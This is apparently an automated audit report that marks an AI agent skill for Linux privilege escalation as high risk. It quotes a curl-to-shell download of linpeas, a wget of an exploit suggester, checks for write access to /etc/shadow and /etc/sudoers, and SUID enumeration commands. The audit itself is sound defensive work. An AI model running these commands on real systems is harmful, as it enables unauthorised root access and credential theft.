performing-privilege-escalation-on-linux

Fail

Audited by Gen Agent Trust Hub on Apr 7, 2026

Risk Level: HIGH
REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, DATA_EXFILTRATION, EXTERNAL_DOWNLOADS
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The workflows.md file contains instructions for downloading and executing remote scripts in a single command pipeline (curl-to-shell), which is a high-risk pattern for arbitrary code execution.
  • Evidence: curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh in references/workflows.md.
  • [EXTERNAL_DOWNLOADS]: The skill facilitates the download and execution of multiple third-party tools from unverified GitHub repositories.
  • Evidence: wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh in references/workflows.md.
  • [DATA_EXFILTRATION]: The scripts/agent.py script performs discovery of sensitive system files that are commonly targeted for credential harvesting or privilege escalation.
  • Evidence: The script checks for write access to /etc/shadow, /etc/passwd, and /etc/sudoers in the check_writable_files function.
  • [COMMAND_EXECUTION]: The scripts/agent.py script uses the subprocess module to execute a wide variety of system-level enumeration commands.
  • Evidence: Functions like enumerate_system_info, check_sudo_permissions, and find_suid_binaries execute commands such as uname -a, sudo -l, and find / -perm -4000.
  • [COMMAND_EXECUTION]: Documentation provides detailed workflows for escaping restricted environments and gaining root access by abusing system binaries and kernel vulnerabilities.
  • Evidence: Examples for abusing SUID binaries like find and python3 to spawn root shells are provided in references/workflows.md.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Apr 7, 2026, 12:58 PM